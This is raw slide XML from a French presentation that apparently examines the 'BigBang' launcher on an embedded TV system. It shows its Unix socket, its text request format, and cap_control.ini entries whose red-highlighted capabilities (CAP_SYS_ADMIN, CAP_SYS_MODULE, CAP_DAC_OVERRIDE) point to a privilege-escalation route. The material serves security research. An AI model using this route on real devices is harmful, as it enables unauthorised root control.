                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{519B4DB3-D6CE-2064-64AD-A6B05139EC2A}"/>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a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>Stratégie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3828509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473E39-2C82-0F77-68A7-C1DB7608C22F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B35578C-0602-8447-9444-6D610402C4B2}"/>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88267B1A-D630-5EA3-8D54-7B11E1A526B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>BigBang</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="ZoneTexte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A3477FF-5495-21A0-6D39-E2EB52D58737}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365125" y="1202363"/>
            <a:ext cx="8509659" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Créer une socket </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>shm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>BigBang_Socket</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE706648-BC06-E444-FB3B-A2378B064512}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365126" y="2318693"/>
            <a:ext cx="8509659" cy="507831"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Protocole textuel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Permet de lancer une application avec les capacités (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>capabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>) définies dans le fichier </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0"/>
              <a:t>/cap_control.ini</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="ZoneTexte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B10BFC0E-2296-811E-B5C7-9063F45EC1BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="783901" y="1636838"/>
            <a:ext cx="7842256" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>srwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-x    1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>svcmgr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>svcmgr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>           0 Jan  1  1970 /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>BigBang_Socket</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="ZoneTexte 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E3C5A02-2CF4-D9F7-8B3E-9EB83CD18FDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2121063" y="3309808"/>
            <a:ext cx="4901874" cy="715581"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>---name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SystemService</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>---path /applications/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SystemService</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SystemService</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>---</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 1000 ---gid 1000 ---priority 1</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="ZoneTexte 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B23759F-9D81-326C-1E1C-23BB56CCEB81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3981450" y="2987288"/>
            <a:ext cx="1181100" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" u="sng" dirty="0"/>
              <a:t>Exemple:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81D0E32D-9410-F14B-4537-E6C51198CA27}"/>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5" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB87C36F-EDF8-0053-75C5-7FEDC4BBED3F}"/>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err="1"/>
              <a:t>BigBang</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2651351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F62D3B4-4F9B-863D-4861-3D9FA0B4CB3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FED8884-B7E3-CA18-E0F5-5B726D049F32}"/>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90CB2004-965E-7E78-EF2F-21169B1C863A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>BigBang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> configuration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="ZoneTexte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FD62AB6-47DC-7196-8640-99BF47CEA9B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365126" y="1202363"/>
            <a:ext cx="3546140" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" u="sng" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" u="sng" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" u="sng" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/cap_control.ini</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD4F3B2B-9E52-E557-095C-B0464DEAFF0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365126" y="1545857"/>
            <a:ext cx="8413748" cy="3208571"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SystemService</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=/applications/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SystemService</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SystemService</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Gid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 1000</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 1000</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Capability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = CAP_SYS_NICE|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CAP_SYS_MODULE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>|CAP_SYS_ADMIN|CAP_SYS_TIME|CAP_DAC_OVERRIDE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[…]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tvmain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=/applications/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>app_wrapper</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Gid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 2910</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 2910</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Capability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = CAP_SYS_NICE|CAP_SYS_BOOT|CAP_KILL|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CAP_SYS_ADMIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CAP_DAC_OVERRIDE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>|CAP_IPC_LOCK|CAP_FOWNER|CAP_WAKE_ALARM|CAP_NET_ADMIN|CAP_NET_RAW|CAP_SYS_RESOURCE|CAP_IPC_OWNER|CAP_SYS_PTRACE|CAP_NET_BIND_SERVICE</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Groups = 2910|2900|2901|10002|10009</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
